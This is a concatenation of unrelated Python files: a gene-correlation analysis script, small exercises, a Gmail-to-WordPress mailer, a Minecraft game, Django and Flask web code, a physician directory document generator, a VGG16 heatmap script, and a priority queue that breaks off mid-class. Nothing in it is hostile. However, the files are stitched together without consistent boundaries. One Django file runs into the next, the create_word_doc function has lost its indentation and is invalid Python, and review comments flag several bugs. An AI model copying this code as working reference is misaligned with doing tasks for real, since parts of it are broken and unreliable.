        return json.dumps(self.to_dict(), indent=indent, ensure_ascii=False, **kwargs)
    @classmethod
    def from_dict(cls, raw_data: dict):
        """Constructor from dict representation."""
        return cattr.structure(raw_data, cls)
    @classmethod
    def from_json(cls, raw_data: str):
        """Constructor from JSON representation."""
        return cls.from_dict(json.loads(raw_data))
|
"""Get the distribution of correlation z scores for pairs a-x or x-b where x
is an intermediate between gene pair a-b.
"""
import sys
import ast
import pickle
import random
import logging
from os import path
from typing import Dict, List, Optional, Tuple
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from depmap_analysis.scripts.depmap_script_expl_funcs import axb_colname, \
bxa_colname, ab_colname, ba_colname, st_colname
from .corr_stats_async import get_corr_stats_mp, GlobalVars, get_pairs_mp
from depmap_analysis.scripts.corr_stats_data_functions import Results
logger = logging.getLogger(__name__)
# Emit INFO-level progress messages from this module.
logger.setLevel(logging.INFO)
def main(expl_df: pd.DataFrame, stats_df: pd.DataFrame, z_corr: pd.DataFrame,
         reactome: Optional[Tuple[Dict[str, List[str]],
                                  Dict[str, List[str]],
                                  Dict[str, str]]] = None,
         eval_str: Optional[bool] = False,
         max_proc: Optional[int] = None,
         max_corr_pairs: int = 10000,
         do_mp_pairs: Optional[bool] = True,
         run_linear: bool = False) -> Results:
    """Get statistics of the correlations associated with different
    explanation types

    Parameters
    ----------
    expl_df: pd.DataFrame
        A pd.DataFrame containing all available explanations for the pairs
        of genes in z_corr. Available in the DepmapExplainer as
        DepmapExplainer.expl_df.
    stats_df: pd.DataFrame
        A pd.DataFrame containing all checked A-B pairs and if they are
        explained or not. Available in the DepmapExplainer as
        DepmapExplainer.stats_df.
    z_corr : pd.DataFrame
        A pd.DataFrame of correlation z scores
    reactome : tuple[dict]|list[dict]
        A tuple or list of dicts. The first dict is expected to contain
        mappings from UP IDs of genes to Reactome pathway IDs. The second
        dict is expected to contain the reverse mapping (i.e Reactome IDs
        to UP IDs). The third dict is expected to contain mappings from the
        Reactome IDs to their descriptions.
    eval_str : bool
        If True, run ast.literal_eval() on the 'expl_data' column of expl_df
    max_proc : int > 0
        The maximum number of processes to run in the multiprocessing in
        get_corr_stats_mp. Default: multiprocessing.cpu_count()
    max_corr_pairs : int
        The maximum number of correlation pairs to process. If the number of
        eligible pairs is larger than this number, a random sample of
        max_so_pairs_size is used. Default: 10 000. If the number of pairs
        to check is smaller than 1000, no sampling is done.
    do_mp_pairs : bool
        If True, get the pairs to process using multiprocessing if larger
        than 10 000. Default: True.
    run_linear : bool
        If True, run the script without multiprocessing. This option is good
        when debugging or if the environment for some reason does not
        support multiprocessing. Default: False.

    Returns
    -------
    Results
        A Dict containing correlation data for different explanations
    """
    # Limit to any a-x-b OR a-b expl (this COULD include explanations where
    # 'direct' and NOT 'pathway' is the explanation, but this should be a
    # very small set)
    logger.info("Filter expl_df to pathway, direct, shared_target")
    expl_df = expl_df[
        (expl_df['expl_type'] == axb_colname) |
        (expl_df['expl_type'] == bxa_colname) |
        (expl_df['expl_type'] == ab_colname) |
        (expl_df['expl_type'] == ba_colname) |
        (expl_df['expl_type'] == st_colname)
    ]
    # Re-map the columns containing string representations of objects
    if eval_str:
        expl_df['expl_data'] = \
            expl_df['expl_data'].apply(lambda x: ast.literal_eval(x))
    # Get all correlation pairs that were explained
    all_ab_corr_pairs = set(map(lambda p: tuple(p),
                                expl_df[['agA', 'agB']].values))
    gbv = GlobalVars(expl_df=expl_df, stats_df=stats_df, sampl=16)
    if not run_linear and do_mp_pairs and len(all_ab_corr_pairs) > 10000:
        # Do multiprocessing
        logger.info('Getting axb subj-obj pairs through multiprocessing')
        gbv.assert_global_vars({'expl_df', 'stats_df'})
        pairs_axb_only = get_pairs_mp(all_ab_corr_pairs, max_proc=max_proc,
                                      max_pairs=max_corr_pairs)
    else:
        logger.info('Assembling axb subj-obj pairs linearly')
        # Pairs where a-x-b AND NOT a-b explanation exists
        pairs_axb_only = set()
        logger.info("Stratifying correlations by interaction type")
        for s, o in all_ab_corr_pairs:
            # Make sure we don't try to explain self-correlations
            if s == o:
                continue
            # Get all interaction types associated with s and o
            int_types = \
                set(expl_df['expl_type'][(expl_df['agA'] == s) &
                                         (expl_df['agB'] == o)].values)
            # Filter to a-x-b, b-x-a, st
            axb_types = \
                {axb_colname, bxa_colname, st_colname}.intersection(int_types)
            # Only allow pairs where we do NOT have ab or ba explanation
            if axb_types and \
                    ab_colname not in int_types and \
                    ba_colname not in int_types:
                pairs_axb_only.add((s, o))
        # Check if we need to sample
        if max_corr_pairs and max_corr_pairs < len(pairs_axb_only):
            logger.info(f'Down sampling number of pairs to {max_corr_pairs}')
            # random.sample requires a sequence: sampling directly from a
            # set was deprecated in Python 3.9 and raises TypeError from
            # 3.11, so materialize a list first.
            pairs_axb_only = random.sample(list(pairs_axb_only),
                                           max_corr_pairs)
    # Check for and remove self correlations
    if not np.isnan(z_corr.loc[z_corr.columns[0], z_corr.columns[0]]):
        logger.info('Removing self correlations')
        diag_val = z_corr.loc[z_corr.columns[0], z_corr.columns[0]]
        # Mask every cell equal to the diagonal value (turns them to NaN)
        z_corr = z_corr[z_corr != diag_val]
    # a-x-b AND NOT direct
    logger.info("Getting correlations for a-x-b AND NOT direct")
    options = {'so_pairs': pairs_axb_only, 'run_linear': run_linear}
    if max_proc:
        options['max_proc'] = max_proc
    # Set and assert existence of global variables
    assert_vars = {'z_cm', 'expl_df', 'stats_df'}
    gbv.update_global_vars(z_cm=z_corr)
    if reactome is not None:
        gbv.update_global_vars(reactome=reactome)
        assert_vars.add('reactome')
    else:
        logger.info('No reactome file provided')
    if gbv.assert_global_vars(assert_vars):
        results: Results = get_corr_stats_mp(**options)
    else:
        raise ValueError('Global variables could not be set')
    return results
if __name__ == '__main__':
    # CLI: <basepath_to_expls> <path_to_combined_z_sc_corr_h5>
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <basepath_to_expls> "
              f"<path_to_combined_z_sc_corr_h5>")
        sys.exit(0)
    expl_pairs_csv = sys.argv[1]  # Path to output data folder
    z_corr_file = sys.argv[2]  # Path to merged z scored correlations file
    logger.info('Loading correlation matrix...')
    z_cm = pd.read_hdf(z_corr_file)
    # Column labels look like "NAME <something>"; keep only the first token
    # and use it for both axes so .loc works symmetrically.
    names = [n.split()[0] for n in z_cm.columns.values]
    z_cm.columns = names
    z_cm.index = names
    #sds = ['1_2sd', '2_3sd', '3_4sd', '4_5sd', '5_sd', 'rnd']
    sds = ['3_4sd']  #, '4_5sd']
    results_by_sd = {}
    for sd in sds:
        expl_fname = path.join(expl_pairs_csv, sd, '_explanations_of_pairs.csv')
        expl_dir = path.dirname(expl_fname)
        results_file = path.join(expl_dir, '%s_results_dict.pkl' % sd)
        # Check if we already have the results
        if path.isfile(results_file):
            with open(results_file, 'rb') as f:
                results_by_sd[sd] = pickle.load(f)
        # If we don't already have the results, compute them
        else:
            # Make sure we have the explanations CSV
            if not path.isfile(expl_fname):
                logger.info('Skipping %s, file does not exist' % expl_fname)
            else:
                logger.info('Getting pairs from %s' % expl_fname)
                df = pd.read_csv(expl_fname, delimiter=',')
                # NOTE(review): main() also requires stats_df; this call
                # passes only expl_df and z_corr and will raise TypeError —
                # confirm where the stats dataframe should come from.
                results = main(expl_df=df, z_corr=z_cm)
                results_by_sd[sd] = results
                logger.info("Pickling results file %s" % results_file)
                with open(results_file, 'wb') as f:
                    pickle.dump(results, f)
    # Load _explanations_of_pairs.csv for each range
    #for sd in ['1_2sd', '2_3sd', '3_4sd', '4_5sd', '5_sd', 'rnd']:
    for sd in sds:
        try:
            results = results_by_sd[sd]
        except KeyError:
            logger.info("Results for %s not found in dict, skipping" % sd)
            continue
        # Loop the different sets:
        #   - axb_and_dir - subset where direct AND pathway explains
        #   - axb_not_dir - subset where pathway, NOT direct explans
        #   - all_axb - the distribution of the any explanation
        for k, v in results.items():
            # Plot:
            # 1: all_x_corrs - the distribution of all gathered a-x,
            #    x-b combined z-scores
            # 2: top_x_corrs - the strongest (over the a-x, x-b average)
            #    z-score per A-B. List contains (A, B, topx).
            # 3:
            for plot_type in ['all_azb_corrs', 'azb_avg_corrs', 'all_x_corrs',
                              'avg_x_corrs', 'top_x_corrs']:
                if len(v[plot_type]) > 0:
                    # Tuple entries carry the score last, e.g. (A, B, topx)
                    if isinstance(v[plot_type][0], tuple):
                        data = [t[-1] for t in v[plot_type]]
                    else:
                        data = v[plot_type]
                    plt.hist(x=data, bins='auto')
                    plt.title('%s %s; %s' %
                              (plot_type.replace('_', ' ').capitalize(),
                               k.replace('_', ' '),
                               sd))
                    plt.xlabel('combined z-score')
                    plt.ylabel('count')
                    # NOTE(review): expl_dir here is whatever the FIRST loop
                    # left behind — undefined if sds was empty.
                    plt.savefig(path.join(expl_dir,
                                          '%s_%s.png' % (plot_type, k)),
                                format='png')
                    plt.show()
                else:
                    logger.warning('Empty result for %s (%s) in range %s'
                                   % (k, plot_type, sd))
|
from math import sqrt
# Read an integer and, when it is positive, report its square root and square.
valor = int(input('digite um numero: '))
if valor > 0:
    print(f'A raiz quadrada do numero digitado é {(sqrt(valor))}, é seu quadrado é {(valor ** 2)}')
|
# Written at the 2013 DC Lady Hackathon for Karen
import email, getpass, imaplib, os
import smtplib
from email.mime.text import MIMEText
# Python 2 script (raw_input): pulls replies to one thread from a GMail
# inbox over IMAP, trims each plain-text part down to the quoted passage,
# and re-mails it to a post-by-email WordPress address over SMTP.
user = raw_input("Enter your GMail username:")
pwd = getpass.getpass("Enter your password: ")
# connecting to the gmail imap server
m = imaplib.IMAP4_SSL("imap.gmail.com")
m.login(user,pwd)
m.select("INBOX")
# here you a can choose a mail box like INBOX instead
# use m.list() to get all the mailboxes
resp, items = m.search(None, 'SUBJECT', '"Re: A Quote to Share, and other things"')
# you could filter using the IMAP rules here
# (check http://www.example-code.com/csharp/imap-search-critera.asp)
# resp is response code from server. it prints "Ok"
items = items[0].split() # getting the mails id
for emailid in items:
    resp, data = m.fetch(emailid, "(RFC822)")
    # fetching the mail, "`(RFC822)`" means "get the whole stuff", but you can ask for headers only, etc
    email_body = data[0][1] # getting the mail content
    mail = email.message_from_string(email_body)
    # we use walk to create a generator so we can iterate on the parts
    # and forget about the recursive headache
    for part in mail.walk():
        # multipart are just containers, so we skip them
        if part.get_content_type() == 'text/plain':
            fullmsg=part.get_payload()
            qs=0
            # NOTE(review): fullmsg is a string, so this iterates
            # CHARACTERS, not lines — qs ends up the index of the first
            # '<' character. Confirm that is the intent.
            for (counter,line) in enumerate(fullmsg):
                if line == "<":
                    qs=counter
                    break
            text=fullmsg[0:qs]
            # Cut off everything from 25 chars before the last ':' — the
            # magic 25 presumably trims a fixed signature/date line; verify.
            index_of_colon = text.rfind(":", 0, qs)
            quote = text[0:index_of_colon-25]
            msg=MIMEText(quote)
            msg['Subject']=mail["From"]
            msg['From'] = 'xxx@gmail.com'
            msg['To'] = 'xxx@post.wordpress.com'
            # NOTE(review): `s` is opened but never used — only `server`
            # actually sends; looks like leftover code.
            s = smtplib.SMTP('smtp.gmail.com')
            server = smtplib.SMTP('smtp.gmail.com',587) #port 465 or 587
            server.ehlo()
            server.starttls()
            server.ehlo()
            server.login(user,pwd)
            server.sendmail('xxx@gmail.com','xxx@post.wordpress.com',msg.as_string())
            server.close()
|
#import the minecraft modules
import mcpi.minecraft as minecraft
import mcpi.block as block
#import random so you can create lights in random locations
import random
#import time so we can put delays into our program
import time
#create the connection to the running Minecraft game server
mc = minecraft.Minecraft.create()
mc.postToChat("Minecraft Whac-a-Block")
#get the position of the player
pos = mc.player.getTilePos()
#build the game board: a 3x3 stone wall 3 blocks in front of the player
mc.setBlocks(pos.x - 1, pos.y, pos.z + 3,
             pos.x + 1, pos.y + 2, pos.z + 3,
             block.STONE.id)
#post a message for the player
mc.postToChat("Get ready ...")
time.sleep(5)
mc.postToChat("Go")
#setup the variables
#how many blocks are lit
blocksLit = 0
#how many points has the player scored
points = 0
#loop until game over (when all the lights are lit)
while blocksLit < 9:
    #sleep for a small amount of time
    time.sleep(0.2)
    #turn off any lights which have been hit
    for hitBlock in mc.events.pollBlockHits():
        #was the block hit glowstone
        if mc.getBlock(hitBlock.pos.x, hitBlock.pos.y, hitBlock.pos.z) == block.GLOWSTONE_BLOCK.id:
            #if it was, turn it back to STONE
            mc.setBlock(hitBlock.pos.x, hitBlock.pos.y, hitBlock.pos.z, block.STONE.id)
            #reduce the number of lights lit
            blocksLit = blocksLit - 1
            #increase the points
            points = points + 1
    #increase the number of lights lit
    blocksLit = blocksLit + 1
    #create the next light on a random board cell that is still stone
    lightCreated = False
    while not lightCreated:
        xPos = pos.x + random.randint(-1,1)
        yPos = pos.y + random.randint(0,2)
        zPos = pos.z + 3
        #if the block is already glowstone, return to the top and try again
        # otherwise set it to the
        if mc.getBlock(xPos, yPos, zPos) == block.STONE.id:
            #set the block to glowstone
            mc.setBlock(xPos, yPos, zPos, block.GLOWSTONE_BLOCK.id)
            lightCreated = True
            #debug
            #print "light created x{} y{} z{}".format(xPos, yPos, zPos)
#display the points scored to the player
mc.postToChat("Game Over - points = " + str(points))
|
#!/usr/bin/env python
import sys
import factor
from math import sqrt
def is_perfsq(n):
    """Return True when *n* is a perfect square (False for negatives).

    Uses exact integer arithmetic (math.isqrt) instead of comparing
    sqrt(n) to int(sqrt(n)); the float version misclassifies large
    squares once sqrt() loses precision past 2**53.
    """
    from math import isqrt  # local import: module header only pulls in sqrt
    if n < 0:
        return False
    r = isqrt(n)
    return r * r == n
def check(a, b, c):
    """Return True when every pairwise sum and difference of a, b, c
    (with a <= b <= c expected) is a perfect square."""
    combos = (c - b, c + b, c - a, c + a, b - a, b + a)
    # all() short-circuits on the first failure, matching the original
    # chained-or evaluation order.
    return all(is_perfsq(v) for v in combos)
def main():
    """Enumerate scaled Pythagorean-style triples (a, b, c) up to a CLI
    bound and print those whose pairwise sums/differences are all perfect
    squares."""
    t_max = int(sys.argv[1])  # single CLI argument bounds s, t and k
    t = 1
    while t <= t_max:
        s = t + 1
        while s <= t_max:
            # Euclid's conditions for a primitive triple: s, t coprime
            # and not both odd. factor.gcd is a project-local helper.
            if (s % 2 == 0 or t % 2 == 0) and factor.gcd(s, t) == 1:
                ba = s * s - t * t
                bb = 2 * s * t
                bc = s * s + t * t
                # Order the two legs so ba <= bb
                if ba > bb:
                    ba, bb = bb, ba
                # Scale the base triple by every k up to the bound
                k = 1
                while k <= t_max:
                    a = k * ba
                    b = k * bb
                    c = k * bc
                    if check(a, b, c):
                        # NOTE(review): check() tests b + a, but the last
                        # printed term is b + c — likely a typo for b + a;
                        # confirm intended output.
                        print(a, b, c, ":", c - a, c - b, b - a, c + a, c + b, b + c)
                    k += 1
            s += 1
        t += 1
# Run only when executed as a script, not on import.
if __name__ == "__main__":
    main()
|
from django.shortcuts import render
from django.views import View
from .models import HashTag
class HashTagView(View):
    """Render the page for a single hashtag together with its posts."""

    def get(self, request, hashtag, *args, **kwargs):
        # Look up the HashTag row matching the URL fragment.
        tag_obj = HashTag.objects.get(tag=hashtag)
        context = {"hashtag": tag_obj, "posts": tag_obj.get_posts()}
        return render(request, "hashtags/tag_page.html", context)
|
from flask import flash
from mongoengine.errors import DoesNotExist, NotUniqueError
from weltcharity import bcrypt
from ..models import User, ContactInfo, Address
class UserFactory():
    """UserFactory handles multiple methods of creating a user or
    logging a user in.
    """
    @staticmethod
    def get_user_info_by_id(id):
        '''Simple method that attempts to sign the user in via their
        string representation of their id.

        :param id: User's id.
        '''
        try:
            return User.objects.get(id=id)
        except DoesNotExist:
            flash("Error: Failed to access your user information, please logout and try again. Sorry for the inconvenience.", category="warning")
            return None
    @staticmethod
    def log_user_in(username_or_email, password):
        '''Attempts to log the user in by their email first and if
        it fails will revert to the username.

        :param username_or_email: User's submitted username or email.
        :param password: User's submitted password.
        '''
        found = None
        # Try the email field first, then fall back to the username.
        for lookup in ({'email': username_or_email},
                       {'username': username_or_email}):
            try:
                found = User.objects.get(**lookup)
                break
            except DoesNotExist:
                continue
        if found is None:
            return False
        # Implicitly returns None on a bad password.
        if bcrypt.check_password_hash(found.password, password):
            return found
    @staticmethod
    def register_user(username, email, password):
        '''Attempts to register the user, if the user has submitted
        a unique username and email address. By the time we get to this
        point we have already validated our form data.

        :param username: User's submitted username
        :param email: User's submitted email address
        :param password: User's submitted password
        '''
        try:
            new_user = User(username=username, email=email, password=password).encrypt_password()
            # Seed default contact/address records so later settings
            # changes always have a structure to write into.
            new_user.contact_info = [ContactInfo()]
            new_user.contact_info[0].address = [Address()]
            new_user.save()
        except NotUniqueError:
            return False
        return new_user
|
# looping through a sequence of numbers using range() method
# range(8) will generate [0,1,2,3,4,5,6,7]
for i in range(8):
    print(i)
|
from django.urls import path, include
from . import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
    path('', views.BranoListView.as_view(), name='sanremo-brani'),
    path('brani/<int:pk>', views.BranoDetailView.as_view(), name='sanremo-brano'),
]

# Serve uploaded media directly only in development.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

# Django site authentication urls (login, logout, password management),
# then the voting and registration endpoints — same resolution order as
# the original incremental additions.
urlpatterns += [
    path('accounts/', include('django.contrib.auth.urls')),
    path('brani/<int:pk>/vota/', views.vota_brano, name='vota-brano'),
    path('register/', views.registrati, name='registrati'),
]
import pandas as pd
from docx import Document
import datetime
import os
import math
# remember to relabel the CITY/STATE columns in the excel sheet - they are backwards
# ADDRESS LINE 2 has a SPACE in front of it
# Current year/month as strings.
# NOTE(review): neither value is referenced anywhere in this script —
# possibly leftover from an earlier filename scheme.
currYear = datetime.date.today().strftime("%Y")
currMonth = datetime.date.today().strftime("%m")
def is_odd(a):
    """Return True when integer *a* has its low bit set (i.e. is odd)."""
    return (a & 1) == 1
# https://github.com/python-openxml/python-docx/issues/33#issuecomment-77661907
# erases the extra paragraph in the table making it take more space
# https://github.com/python-openxml/python-docx/issues/33#issuecomment-77661907
# erases the extra paragraph in the table making it take more space
def delete_paragraph(paragraph):
    """Remove *paragraph* from its docx parent element entirely."""
    # Detach the underlying lxml element from the document tree ...
    p = paragraph._element
    p.getparent().remove(p)
    # ... and break the proxy's references so it cannot be reused.
    p._p = p._element = None
#spit out a word doc
def create_word_doc(specialties, dataFrame, headerOfFile):
# create word document
document = Document()
document.add_heading(headerOfFile, 0)
for specialty in specialties:
physicians = dataFrame[dataFrame.SPECIALTY1 == specialty]
# get rid of empty fields and fill w/ empty string
physicians = physicians.fillna('')
document.add_heading(specialty, 1)
# find out how many rows I need as an integer; add an extra row if # is odd
rowCount = physicians.shape[0] # gives number of rows in this dataframe
rowNum: int = int(math.ceil(rowCount / 2))
# add table (rows, columns)
table = document.add_table(rowNum, 2)
currColumn = 0
currRow = 0
for index, row in physicians.iterrows():
physicianName = row['LAST NAME'] + ", " + row['FIRST NAME'] + " " + row['TITLE']
officeAddress = row['ADDRESS LINE1'] + " " + row[' ADDRESS LINE 2'] + "\n" + row['CITY'] + ', ' + row[
'STATE'] + ' ' + str(row['ZIP'])
officePhone = row['OFFICE PHONE']
officeFax = row['OFFICE FAX']
cell = table.cell(currRow, currColumn)
delete_paragraph(cell.paragraphs[-1])
p = cell.add_paragraph()
p.add_run(physicianName + "\n").bold = True
p.add_run(officeAddress + "\n")
p.add_run("Office Phone: " + officePhone + "\n")
p.add_run("Office Fax: " + officeFax)
if is_odd(currColumn):
currColumn = 0
currRow = currRow + 1
else:
currColumn = 1
document.add_paragraph('Get the most up to date information and schedule an appointment online: https://www.johnmuirhealth.com/fad/')
fileName = headerOfFile + '.docx'
filePath = os.path.join('worddoc', fileName)
document.save(filePath)
# Load the directory spreadsheet, drop non-physician rows, and emit the
# combined-specialty documents.
# don't specify sheet name so can just get the 1st
excelSheet = pd.read_excel('jmdirectory2018.xls', index_col=None, na_values=['NA'])
# drop e-mail column; Note: axis=1 denotes that we are referring to a column, not a row
excelSheet = excelSheet.drop('EMAIL ADDRESS', axis=1)
# remove rows containing PAs, certified nursing midwife, NP
titlesToRemove = ('PA', 'PA-C', 'CNM', 'NP', 'RN', 'RNFA')
for title in titlesToRemove:
    excelSheet = excelSheet[excelSheet.TITLE != title]
#combine specialties that should show up together
thoracicSpecialities = ('Cardiac Surgery', 'Cardiothoracic Surgery', 'Thoracic Surgery')
cardiologySubSpecialities = ('Cardiology', 'Cardiac Electrophysiology', 'Interventional Cardiology')
ophthoSubSpecialties = ('Ophthalmology', 'Oculoplastic Surgery', 'Retinal Ophthalmology')
surgerySubSpecialties = ('General Surgery', 'Colon and Rectal Surgery')
obSubSpecialties = ('Obstetrics and Gynecology', 'Perinatology', 'Gynecologic Oncology', 'Gynecology', 'Obstetrics', 'Reproductive Endocrinology and Infertility')
# carve out pediatric subspecialties note the space after Pediatric which will collect Peds cards, etc.
pediatricSubspecialities = excelSheet[excelSheet.SPECIALTY1.str.contains("Pediatric ") == 1][
    'SPECIALTY1'].drop_duplicates()
# One grouped document per combined-specialty list.
create_word_doc(thoracicSpecialities, excelSheet, "John Muir - Thoracic & Cardiothoracic Surgery")
create_word_doc(cardiologySubSpecialities, excelSheet, 'John Muir - Cardiology')
create_word_doc(ophthoSubSpecialties, excelSheet, "John Muir - Ophthalmology")
create_word_doc(surgerySubSpecialties, excelSheet, 'John Muir - General Surgery and Colorectal Surgery')
create_word_doc(obSubSpecialties, excelSheet, 'John Muir - OB-GYN and Gyn-Onc')
create_word_doc(pediatricSubspecialities, excelSheet, 'John Muir - Pediatric Specialties')
# Specialties that never get a standalone document (hospital-based,
# non-physician, or administrative categories).
specialtiesToRemove = ('Addiction Specialist',
                       'Anesthesiology',
                       'Cardiac Anesthesiology',
                       'Dentistry',
                       'Diagnostic Radiology',
                       'Emergency Medicine',
                       'Gastroenterology (Hospital-Based Only)',
                       'General Surgery-Surgical Assist',
                       'Hospitalist',
                       'Hyperbaric Medicine',
                       'Neonatology',
                       'Nurse Practitioner - Breast Health',
                       'Nurse Practitioner - Palliative Care',
                       'Palliative Care',
                       'Pathology',
                       'Pediatric Hospitalist',
                       'Pediatric Radiology',
                       'Perioperative Medicine',
                       'Physician Assistant - Orthopedic',
                       'Registered Nurse First Assist (RNFA)',
                       'Spine Specialist',
                       'Surgical Assistant',
                       'Teleradiology',
                       'Urgent Care Provider')
#remove all the specialties I've already made lists of
specialtiesToRemove = specialtiesToRemove + thoracicSpecialities + cardiologySubSpecialities + ophthoSubSpecialties + surgerySubSpecialties + obSubSpecialties
for specialty in specialtiesToRemove:
    excelSheet = excelSheet[excelSheet.SPECIALTY1 != specialty]
# One document per remaining specialty.
# NOTE(review): this loop duplicates create_word_doc almost line for line;
# only the heading ('John Muir - ' prefix) and the file name differ —
# consider extending create_word_doc with an optional file name instead.
# cuts out all the pediatric subspecialists + duplicates
specialties = excelSheet[excelSheet.SPECIALTY1.str.contains("Pediatric ") == 0]['SPECIALTY1'].drop_duplicates()
for specialty in specialties:
    # list all physician of X specialty
    physicians = excelSheet[excelSheet.SPECIALTY1 == specialty]
    # get rid of empty fields
    physicians = physicians.fillna('')
    # create new word document
    document = Document()
    document.add_heading('John Muir - ' + specialty, 0)
    # find out how many rows I need as an integer; add an extra row if # is odd
    rowCount = physicians.shape[0]  # gives number of rows in this dataframe
    rowNum = int(math.ceil(rowCount / 2))
    # add table (rows, columns)
    table = document.add_table(rowNum, 2)
    # Fill the two-column table left-to-right, top-to-bottom.
    currColumn = 0
    currRow = 0
    for index, row in physicians.iterrows():
        physicianName = row['LAST NAME'] + ", " + row['FIRST NAME'] + " " + row['TITLE']
        officeAddress = row['ADDRESS LINE1'] + " " + row[' ADDRESS LINE 2'] + "\n" + row['CITY'] + ', ' + row[
            'STATE'] + ' ' + str(row['ZIP'])
        officePhone = row['OFFICE PHONE']
        officeFax = row['OFFICE FAX']
        cell = table.cell(currRow, currColumn)
        delete_paragraph(cell.paragraphs[-1])
        p = cell.add_paragraph()
        p.add_run(physicianName + "\n").bold = True
        p.add_run(officeAddress + "\n")
        p.add_run("Office Phone: " + officePhone + "\n")
        p.add_run("Office Fax: " + officeFax)
        if is_odd(currColumn):
            currColumn = 0
            currRow = currRow + 1
        else:
            currColumn = 1
    document.add_paragraph('Get the most up to date information and schedule an appointment online: https://www.johnmuirhealth.com/fad/')
    # deal w/ heme/onc creating a new directory
    specialty = specialty.replace("/", "-")
    fileName = specialty + '.docx'
    filePath = os.path.join('worddoc', fileName)
    document.save(filePath)
# https://stackoverflow.com/questions/16476924/how-to-iterate-over-rows-in-a-dataframe-in-pandas
# deal with blank fields by making them empty strings
# https://stackoverflow.com/questions/29782898/combine-pandas-data-frame-column-values-into-new-column |
import torch
import torch.nn as nn
import torchvision.transforms as transforms
from torchvision import datasets
from torchvision.models import vgg16
import Pt_nn
from skimage.transform import resize
# Define the neural network that is used to classify images from the CIFAR10
# dataset.
class VGG16_CNN(nn.Module):
    """Pretrained VGG16 wrapper exposing the last conv feature maps and
    their gradients (Grad-CAM-style introspection)."""
    def __init__(self):
        super().__init__()
        # load the pretrained VGG16 network
        self.vgg16 = vgg16(pretrained=True)
        # dissect the network in order to get access to the feature maps of
        # the convolutional layers
        self.features = self.vgg16.features[:30]
        # We have to add the missing max pooling operation again...
        self.max_pool = self.vgg16.features[30]
        # Extract the remaining layers of the VGG16 network
        self.avg_pool = self.vgg16.avgpool
        self.classifier = self.vgg16.classifier
        # Create class variable to store the gradients
        self.gradients = None
    def grad_hook(self, gradients):
        # Backward hook target: stashes the gradient w.r.t. the feature maps.
        self.gradients = gradients
    def get_feature_gradients(self, feature_layer=None):
        # NOTE(review): implicitly returns None when feature_layer is given
        # — the non-default branch looks unfinished; confirm.
        if feature_layer is None:
            return self.gradients
    def get_feature_maps(self, x, feature_layer=None):
        # NOTE(review): same implicit-None caveat as get_feature_gradients.
        if feature_layer is None:
            x = self.features(x)
        return x
    def forward(self, x):
        # Run the conv stack, register the hook so backward() fills
        # self.gradients, then finish the standard VGG16 head.
        x = self.get_feature_maps(x)
        x.register_hook(self.grad_hook)
        x = self.max_pool(x)
        x = self.avg_pool(x)
        # Flatten for the fully-connected classifier.
        x = x.view((x.shape[0], -1))
        x = self.classifier(x)
        return x
def load_testset(batch_size=1, normalized=True, shuffle=True):
    """Return a DataLoader over the local ./data/ImageNet/ image folder.

    When *normalized* is set, images are resized to 224x224 and normalized
    with the standard ImageNet statistics; otherwise they are only
    converted to tensors.
    """
    if normalized:
        # Use the standard normalization for ImageNet
        tfm = transforms.Compose([
            transforms.Resize((224, 224)),
            transforms.ToTensor(),
            transforms.Normalize(
                mean=[0.485, 0.456, 0.406],
                std=[0.229, 0.224, 0.225])
        ])
    else:
        tfm = transforms.ToTensor()
    dataset = datasets.ImageFolder(
        root='./data/ImageNet/', transform=tfm)
    return torch.utils.data.DataLoader(
        dataset, batch_size=batch_size, shuffle=shuffle, num_workers=2)
def x_gen_heatmap(imgIndx=0):
    """Generate gradient heatmaps for the test image at index *imgIndx*.

    Returns the (images, labels, act_maps, pred_indcs) tuple from
    Pt_nn.gen_heatmap_grad, with pred_indcs flattened to 2-D.
    """
    # load the model
    model = VGG16_CNN()
    # Advance ONE iterator to reach the requested image. The original code
    # rebuilt the iterator on every pass (and used the Python-2 style
    # .next()), so it always yielded image 0 regardless of imgIndx.
    loader = iter(load_testset(shuffle=False))
    for _ in range(imgIndx + 1):
        input_image, label = next(loader)
    images, labels, act_maps, pred_indcs = Pt_nn.gen_heatmap_grad(
        model, input_image)
    return images, labels, act_maps, pred_indcs.view(-1, pred_indcs.size(1))
def x_plot_heatmaps():
    """Upscale the activation maps to image resolution and plot them."""
    images, labels, act_maps, pred_indcs = x_gen_heatmap()
    # Allocate one full-resolution map per (image, feature) pair.
    scaled_act_maps = torch.zeros([
        images.size()[0],     # batch dimension
        act_maps.size()[1],   # feature map
        images.size()[2],     # x-dim
        images.size()[3]])    # y-dim
    # scale the activation maps to the size of the original images
    # and normalize the dynamic range of each image to a range of [0, 1]
    # (skimage.transform.resize works on numpy, hence the detach/convert).
    for img_indx in range(act_maps.size()[0]):
        for feature_indx in range(act_maps.size()[1]):
            scaled_act_maps[img_indx, feature_indx, :, :] =\
                torch.tensor(resize(
                    act_maps[img_indx, feature_indx, :, :].detach().numpy(),
                    images.size()[2:]))
    Pt_nn.plot_heatmaps(images, labels, scaled_act_maps, pred_indcs, 5)
if __name__ == '__main__':
    # Normalized tensor feeds the network; an unnormalized copy of the
    # same (unshuffled) first image is kept for display.
    tl = load_testset(batch_size=1, shuffle=False)
    # Use the builtin next(); the Python-2 style iterator.next() method
    # does not exist on modern DataLoader iterators.
    input_image, label = next(iter(tl))
    tl = load_testset(batch_size=1, normalized=False, shuffle=False)
    image, _ = next(iter(tl))
    image = torch.squeeze(image)
    model = VGG16_CNN()
    Pt_nn.gen_heatmap_grad(model, input_image, image)
|
import heapq
class PriorityQueue:
    """Min-priority queue over arbitrary items, ordered by ``key(item)``.

    Entries are stored as ``(priority, seq, item)`` triples. The
    monotonically increasing ``seq`` breaks priority ties, so items whose
    keys compare equal never need to be comparable themselves (the
    original two-tuple layout raised TypeError for, e.g., dicts with
    equal keys) and equal-priority items pop in FIFO order.

    ``self.empty`` mirrors whether the queue holds any items, matching
    the original public attribute.
    """
    def __init__(self, data=None, key=lambda x: x):
        """Create a queue, optionally pre-loaded from iterable *data*."""
        self.key = key
        self._seq = 0        # tie-breaker counter, never reused
        self._data = []
        self.empty = True
        if data:
            for item in data:
                self._data.append((key(item), self._seq, item))
                self._seq += 1
            heapq.heapify(self._data)
            self.empty = False
    def push(self, item):
        """Insert *item* in O(log n)."""
        heapq.heappush(self._data, (self.key(item), self._seq, item))
        self._seq += 1
        self.empty = False
    def pop(self):
